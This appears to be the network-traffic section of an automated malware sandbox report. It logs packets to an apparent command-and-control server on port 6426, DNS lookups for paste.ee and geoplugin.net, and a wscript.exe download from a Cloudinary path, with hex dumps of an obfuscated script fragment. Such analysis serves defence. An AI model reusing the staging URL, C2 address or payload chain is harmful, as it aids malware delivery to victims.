Dec 14, 2024 14:00:52.893739939 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.893889904 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.893938065 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.895365000 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.895458937 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.895505905 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.896939039 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.897058010 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.897098064 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.898514986 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.898608923 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.898648024 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.900064945 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.900127888 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.900180101 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.901631117 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.901740074 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.901783943 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.903434992 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.903532028 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.903577089 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.904755116 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.904881954 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.904931068 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.906444073 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.906529903 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.906579018 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.907985926 CET  6426         49721      160.25.73.25   192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.908070087 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.908109903 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.909621954 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.909694910 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.909743071 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.911209106 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.911262035 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.911308050 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.912746906 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.912792921 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.912837029 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.914335012 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.914376020 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.914422035 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.915885925 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.916013002 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.916059017 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.917467117 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.917587042 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.917630911 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.919075966 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.919229984 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.919270039 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.195020914 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.315058947 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315099001 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315140963 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.315151930 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315174103 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.315181017 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315197945 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.315237999 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315290928 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315341949 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315829992 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.316565990 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.316698074 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435622931 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435668945 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435729027 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435758114 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435794115 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435822964 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.436038971 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.436093092 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:01:15.643978119 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:01:15.696904898 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:01:15.817044973 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:01:45.655976057 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:01:45.672616959 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:01:45.793133974 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:02:15.659558058 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:02:15.661016941 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:02:15.780986071 CET642649720160.25.73.25192.168.2.12
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 14:00:12.352983952 CET | 56794 | 53 | 192.168.2.12 | 1.1.1.1
Dec 14, 2024 14:00:12.490973949 CET | 53 | 56794 | 1.1.1.1 | 192.168.2.12
Dec 14, 2024 14:00:40.965120077 CET | 51429 | 53 | 192.168.2.12 | 1.1.1.1
Dec 14, 2024 14:00:41.106004953 CET | 53 | 51429 | 1.1.1.1 | 192.168.2.12
Dec 14, 2024 14:00:47.654666901 CET | 62150 | 53 | 192.168.2.12 | 1.1.1.1
Dec 14, 2024 14:00:47.886625051 CET | 53 | 62150 | 1.1.1.1 | 192.168.2.12
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 14, 2024 14:00:12.352983952 CET | 192.168.2.12 | 1.1.1.1 | 0xba3a | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:40.965120077 CET | 192.168.2.12 | 1.1.1.1 | 0x4d14 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:47.654666901 CET | 192.168.2.12 | 1.1.1.1 | 0xc372 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 14:00:12.490973949 CET | 1.1.1.1 | 192.168.2.12 | 0xba3a | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 14:00:12.490973949 CET | 1.1.1.1 | 192.168.2.12 | 0xba3a | No error (0) | cloudinary.map.fastly.net | - | 151.101.193.137 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:12.490973949 CET | 1.1.1.1 | 192.168.2.12 | 0xba3a | No error (0) | cloudinary.map.fastly.net | - | 151.101.129.137 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:12.490973949 CET | 1.1.1.1 | 192.168.2.12 | 0xba3a | No error (0) | cloudinary.map.fastly.net | - | 151.101.1.137 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:12.490973949 CET | 1.1.1.1 | 192.168.2.12 | 0xba3a | No error (0) | cloudinary.map.fastly.net | - | 151.101.65.137 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:31.823565960 CET | 1.1.1.1 | 192.168.2.12 | 0x72d4 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 14:00:31.823565960 CET | 1.1.1.1 | 192.168.2.12 | 0x72d4 | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:34.982331038 CET | 1.1.1.1 | 192.168.2.12 | 0x93fb | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:34.982331038 CET | 1.1.1.1 | 192.168.2.12 | 0x93fb | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:41.106004953 CET | 1.1.1.1 | 192.168.2.12 | 0x4d14 | No error (0) | paste.ee | - | 104.21.84.67 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:41.106004953 CET | 1.1.1.1 | 192.168.2.12 | 0x4d14 | No error (0) | paste.ee | - | 172.67.187.200 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:00:47.886625051 CET | 1.1.1.1 | 192.168.2.12 | 0xc372 | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 14:01:58.457505941 CET | 1.1.1.1 | 192.168.2.12 | 0x8718 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 14:01:58.457505941 CET | 1.1.1.1 | 192.168.2.12 | 0x8718 | No error (0) | s-part-0035.t-0009.t-msedge.net | - | 13.107.246.63 | A (IP address) | IN (0x0001) | false
• res.cloudinary.com
• paste.ee
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49722 | 178.237.33.50 | 80 | 7040 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 14:00:48.013647079 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 14, 2024 14:00:49.266374111 CET | 1171 | IN | HTTP/1.1 200 OK
date: Sat, 14 Dec 2024 13:00:49 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49710 | 151.101.193.137 | 443 | 6884 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:00:14 UTC | 372 | OUT | GET /dzakc3wag/raw/upload/v1734112417/uploaded_textfile HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: res.cloudinary.com
Connection: Keep-Alive
2024-12-14 13:00:14 UTC | 776 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 157299
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="uploaded_textfile"
Etag: "e39538cf60c1a9768333bf00e0262702"
Last-Modified: Fri, 13 Dec 2024 17:53:38 GMT
Date: Sat, 14 Dec 2024 13:00:14 GMT
Strict-Transport-Security: max-age=604800
Cache-Control: public, no-transform, immutable, max-age=2592000
Server-Timing: cld-fastly;dur=230;cpu=119;start=2024-12-14T13:00:14.316Z;desc=miss,rtt;dur=169,cloudinary;dur=101;start=2024-12-14T13:00:14.439Z
Server: Cloudinary
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing
x-request-id: 09309909e85cdcf78096ba77219125ea
2024-12-14 13:00:14 UTC | 1378 | IN | Data Raw: 71 69 57 47 4e 47 4e 66 57 75 78 69 62 42 57 20 3d 20 22 4b 4e 75 6b 47 55 42 5a 43 4c 4c 63 42 4a 61 22 0d 0a 4b 4c 6b 4f 6b 4f 75 47 68 6a 78 6d 4c 7a 7a 20 3d 20 22 63 6e 66 4c 75 76 63 57 57 75 66 69 4b 42 49 22 0d 0a 4c 57 4c 4e 62 6b 65 6d 55 57 67 41 75 43 4c 20 3d 20 22 4c 6c 64 4b 65 78 55 6c 6d 4c 49 65 6d 78 70 22 0d 0a 75 67 63 68 67 4b 61 42 51 4c 70 6d 63 69 4b 20 3d 20 22 4f 6f 4f 47 4b 4c 47 57 4c 4e 4c 55 41 6b 53 22 0d 0a 69 4c 68 62 54 61 4c 4c 67 6c 64 66 6f 57 48 20 3d 20 22 54 6d 4b 6e 4e 4a 68 55 6e 69 61 57 6e 69 4e 22 0d 0a 75 62 76 70 4c 69 57 4c 41 6b 65 41 64 68 63 20 3d 20 22 6b 65 4c 57 4a 63 4b 66 50 6c 42 69 4b 4c 7a 22 0d 0a 50 61 52 68 66 4e 6c 50 64 69 69 4e 51 6c 57 20 3d 20 22 69 43 49 6c 53 7a 57 41 6b 6e 51 47 4e 69
Data Ascii: qiWGNGNfWuxibBW = "KNukGUBZCLLcBJa"KLkOkOuGhjxmLzz = "cnfLuvcWWufiKBI"LWLNbkemUWgAuCL = "LldKexUlmLIemxp"ugchgKaBQLpmciK = "OoOGKLGWLNLUAkS"iLhbTaLLgldfoWH = "TmKnNJhUniaWniN"ubvpLiWLAkeAdhc = "keLWJcKfPlBiKLz"PaRhfNlPdiiNQlW = "iCIlSzWAknQGNi
2024-12-14 13:00:14 UTC | 1378 | IN | Data Raw: 47 4c 69 64 69 62 4b 73 47 64 68 7a 20 3d 20 22 4f 75 55 69 47 74 64 5a 6b 65 7a 66 4a 4a 41 22 0d 0a 6a 4c 52 69 68 55 76 74 6b 5a 57 69 50 48 6d 20 3d 20 22 64 5a 5a 50 52 57 54 4e 57 55 4c 4e 4c 55 6e 22 0d 0a 52 57 62 63 4c 71 6e 63 5a 63 6a 69 57 6f 55 20 3d 20 22 53 70 57 5a 65 78 6b 50 6a 72 61 4e 69 50 5a 22 0d 0a 4c 4e 65 63 4c 69 62 57 5a 57 6b 70 57 67 4b 20 3d 20 22 66 57 64 4c 69 69 55 4a 71 42 68 43 62 55 4c 22 0d 0a 4c 62 4c 71 52 63 71 69 4e 4b 69 71 62 57 74 20 3d 20 22 5a 43 73 42 66 6c 70 70 50 6d 5a 41 71 4c 78 22 0d 0a 43 7a 57 55 61 4c 6d 57 70 61 4b 74 6d 75 57 20 3d 20 22 6d 4c 41 75 6c 57 57 4c 75 76 62 69 51 7a 70 22 0d 0a 4a 57 57 47 76 63 68 63 68 66 63 71 4c 78 64 20 3d 20 22 4c 75 70 50 48 57 55 6b 5a 71 78 4c 47 41 57 22 0d
Data Ascii: GLidibKsGdhz = "OuUiGtdZkezfJJA"jLRihUvtkZWiPHm = "dZZPRWTNWULNLUn"RWbcLqncZcjiWoU = "SpWZexkPjraNiPZ"LNecLibWZWkpWgK = "fWdLiiUJqBhCbUL"LbLqRcqiNKiqbWt = "ZCsBflppPmZAqLx"CzWUaLmWpaKtmuW = "mLAulWWLuvbiQzp"JWWGvchchfcqLxd = "LupPHWUkZqxLGAW"
2024-12-14 13:00:14 UTC | 1378 | IN | Data Raw: 65 62 4b 6c 57 64 4b 6d 47 20 3d 20 22 4c 47 66 5a 69 4c 4c 52 67 6f 47 4e 69 62 78 22 0d 0a 68 6b 4b 4a 55 4c 63 69 6b 70 4b 69 5a 6d 42 20 3d 20 22 63 4b 50 4a 6e 54 76 4c 73 57 6c 4b 57 64 4c 22 0d 0a 53 47 68 65 61 69 65 74 4b 50 6d 55 55 63 6b 20 3d 20 22 57 70 63 75 5a 43 67 68 42 65 4c 43 54 57 51 22 0d 0a 65 4c 50 6f 5a 4f 6b 57 65 4c 70 51 69 78 75 20 3d 20 22 69 76 69 64 63 6f 65 57 63 4c 41 51 6b 65 47 22 0d 0a 53 6b 68 4c 64 4f 78 66 42 65 4c 63 69 64 4b 20 3d 20 22 68 68 69 6b 57 65 57 6d 4c 66 4c 6c 5a 6f 47 22 0d 0a 47 64 6d 64 4c 69 50 63 65 4e 4b 43 65 50 67 20 3d 20 22 52 75 5a 75 74 6b 6e 4c 71 4e 68 70 71 4e 61 22 0d 0a 0d 0a 57 6b 6d 42 4c 4c 53 69 42 6b 4c 6c 43 4e 64 20 3d 20 22 72 6d 4c 57 6b 61 57 6f 70 50 7a 4e 49 6b 4c 22 0d 0a
Data Ascii: ebKlWdKmG = "LGfZiLLRgoGNibx"hkKJULcikpKiZmB = "cKPJnTvLsWlKWdL"SGheaietKPmUUck = "WpcuZCghBeLCTWQ"eLPoZOkWeLpQixu = "ividcoeWcLAQkeG"SkhLdOxfBeLcidK = "hhikWeWmLfLlZoG"GdmdLiPceNKCePg = "RuZutknLqNhpqNa"WkmBLLSiBkLlCNd = "rmLWkaWopPzNIkL"
2024-12-14 13:00:14 UTC | 1378 | IN | Data Raw: 6b 65 4c 65 47 6f 73 54 20 3d 20 22 52 71 57 61 4b 78 6f 64 6e 6b 5a 6f 7a 78 68 22 0d 0a 41 4c 61 57 47 4c 63 6d 74 41 47 47 72 4c 50 20 3d 20 22 5a 62 6a 69 73 66 69 57 4b 71 6a 57 57 66 6b 22 0d 0a 4b 62 57 47 51 6b 4b 47 4c 4c 68 6d 47 57 52 20 3d 20 22 78 5a 63 57 4f 65 7a 57 6d 7a 62 4c 70 61 76 22 0d 0a 65 57 55 66 6b 6f 61 57 47 42 4c 4c 72 48 42 20 3d 20 22 7a 6c 64 52 4b 54 63 6b 41 41 76 6b 47 47 69 22 0d 0a 6f 61 6d 50 50 62 63 55 6b 6d 65 4b 67 4c 4b 20 3d 20 22 6e 47 42 6c 42 55 55 66 63 65 47 4f 6e 4c 65 22 0d 0a 53 57 61 4e 4b 65 41 72 73 4b 64 65 66 69 51 20 3d 20 22 57 63 5a 4c 6f 68 4b 4b 54 78 57 74 72 47 66 22 0d 0a 57 7a 6b 4f 6f 68 41 55 57 69 61 7a 6b 78 66 20 3d 20 22 43 74 4f 54 4a 57 66 57 4c 41 62 48 69 4c 5a 22 0d 0a 41 4c 4b
                                                                                                                                          Data Ascii: keLeGosT = "RqWaKxodnkZozxh"ALaWGLcmtAGGrLP = "ZbjisfiWKqjWWfk"KbWGQkKGLLhmGWR = "xZcWOezWmzbLpav"eWUfkoaWGBLLrHB = "zldRKTckAAvkGGi"oamPPbcUkmeKgLK = "nGBlBUUfceGOnLe"SWaNKeArsKdefiQ = "WcZLohKKTxWtrGf"WzkOohAUWiazkxf = "CtOTJWfWLAbHiLZ"ALK
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 6c 61 63 68 41 20 3d 20 22 66 70 5a 6d 50 4c 69 4c 57 72 41 57 69 47 62 22 0d 0a 69 73 69 54 75 5a 4c 4c 7a 53 4a 41 57 4e 57 20 3d 20 22 6d 65 6d 4b 57 4c 69 57 5a 6e 47 57 57 47 4f 22 0d 0a 0d 0a 61 63 50 4f 74 57 65 50 4c 4c 41 4c 4c 69 5a 20 3d 20 22 69 41 57 41 4c 74 50 6e 63 6a 65 66 4f 7a 71 22 0d 0a 64 4c 4b 5a 6b 55 4a 49 50 66 4b 4b 70 65 4c 20 3d 20 22 43 47 48 42 54 50 63 6c 48 4e 75 66 7a 4c 41 22 0d 0a 4b 6b 4c 6b 73 73 4c 6c 69 57 63 62 53 55 6a 20 3d 20 22 55 6e 61 57 4c 63 4c 6d 6b 4f 6b 68 52 4c 4b 22 0d 0a 5a 42 4c 51 68 62 54 4c 4c 50 57 68 69 63 5a 20 3d 20 22 41 57 69 47 62 6f 7a 4c 67 52 75 65 4e 70 68 22 0d 0a 4c 55 57 6d 4c 4c 4e 41 49 63 4c 6c 6d 4e 6c 20 3d 20 22 57 70 7a 41 6b 57 70 4f 4c 70 5a 42 73 4c 55 22 0d 0a 4c 6c 6a 57
                                                                                                                                          Data Ascii: lachA = "fpZmPLiLWrAWiGb"isiTuZLLzSJAWNW = "memKWLiWZnGWWGO"acPOtWePLLALLiZ = "iAWALtPncjefOzq"dLKZkUJIPfKKpeL = "CGHBTPclHNufzLA"KkLkssLliWcbSUj = "UnaWLcLmkOkhRLK"ZBLQhbTLLPWhicZ = "AWiGbozLgRueNph"LUWmLLNAIcLlmNl = "WpzAkWpOLpZBsLU"LljW
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 66 47 4b 4c 20 3d 20 22 57 57 41 4e 63 63 4b 41 51 65 57 57 53 69 70 22 0d 0a 53 52 68 75 7a 4c 4f 47 62 50 74 62 55 64 54 20 3d 20 22 71 57 68 65 4c 6c 75 4c 66 51 50 66 4c 4c 4b 22 0d 0a 71 55 62 62 66 69 7a 47 4c 63 57 5a 67 71 69 20 3d 20 22 6d 75 57 69 68 63 69 62 69 43 66 66 4e 71 47 22 0d 0a 5a 78 6f 42 6b 5a 47 6b 4e 4c 4c 4b 42 41 55 20 3d 20 22 43 6b 47 5a 41 4b 6d 65 74 53 4c 73 69 70 54 22 0d 0a 55 57 4b 63 74 4b 63 41 4e 74 4c 47 57 57 74 20 3d 20 22 4e 42 5a 6c 65 4b 6d 64 64 47 55 50 55 69 55 22 0d 0a 0d 0a 69 72 49 4c 63 74 52 69 4e 47 4b 76 67 42 4c 20 3d 20 22 63 6d 55 7a 69 50 6a 4e 71 76 5a 4b 62 5a 4c 22 0d 0a 74 69 5a 6b 50 63 65 47 61 4c 6e 57 69 41 4c 20 3d 20 22 4e 61 4b 57 64 61 73 67 63 4e 70 63 47 69 72 22 0d 0a 69 57 5a 4c 55
                                                                                                                                          Data Ascii: fGKL = "WWANccKAQeWWSip"SRhuzLOGbPtbUdT = "qWheLluLfQPfLLK"qUbbfizGLcWZgqi = "muWihcibiCffNqG"ZxoBkZGkNLLKBAU = "CkGZAKmetSLsipT"UWKctKcANtLGWWt = "NBZleKmddGUPUiU"irILctRiNGKvgBL = "cmUziPjNqvZKbZL"tiZkPceGaLnWiAL = "NaKWdasgcNpcGir"iWZLU
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 6a 6b 66 20 3d 20 22 49 65 43 4e 4c 6f 6c 66 57 4e 53 6b 52 4b 65 22 0d 0a 67 4c 6c 63 64 47 63 57 47 4e 6d 62 4c 76 41 20 3d 20 22 57 52 70 4b 4b 4b 55 4c 57 55 4c 4f 55 4c 65 22 0d 0a 6f 55 43 55 66 6b 47 50 62 70 4b 6c 57 66 55 20 3d 20 22 75 57 6f 63 4c 6e 41 6a 70 7a 57 69 54 4b 57 22 0d 0a 6e 62 4b 5a 67 68 53 54 41 4b 61 61 51 52 55 20 3d 20 22 7a 41 4c 57 4f 4c 4e 6d 47 78 51 57 4e 6f 70 22 0d 0a 54 65 65 42 55 6b 6c 70 6f 6e 6f 6f 4c 6b 50 20 3d 20 22 6b 68 69 62 7a 57 57 4e 4c 69 63 73 6c 43 55 22 0d 0a 51 57 62 4c 63 71 55 4f 50 4c 42 55 43 66 41 20 3d 20 22 41 48 50 61 70 57 47 6a 6b 4a 4e 55 57 57 69 22 0d 0a 74 70 69 4a 55 68 6f 70 43 51 7a 57 4b 62 4c 20 3d 20 22 55 53 74 4f 6e 4c 6c 4c 6b 63 6b 6d 4b 62 57 22 0d 0a 6b 55 68 6c 63 6f 55 47
                                                                                                                                          Data Ascii: jkf = "IeCNLolfWNSkRKe"gLlcdGcWGNmbLvA = "WRpKKKULWULOULe"oUCUfkGPbpKlWfU = "uWocLnAjpzWiTKW"nbKZghSTAKaaQRU = "zALWOLNmGxQWNop"TeeBUklponooLkP = "khibzWWNLicslCU"QWbLcqUOPLBUCfA = "AHPapWGjkJNUWWi"tpiJUhopCQzWKbL = "UStOnLlLkckmKbW"kUhlcoUG
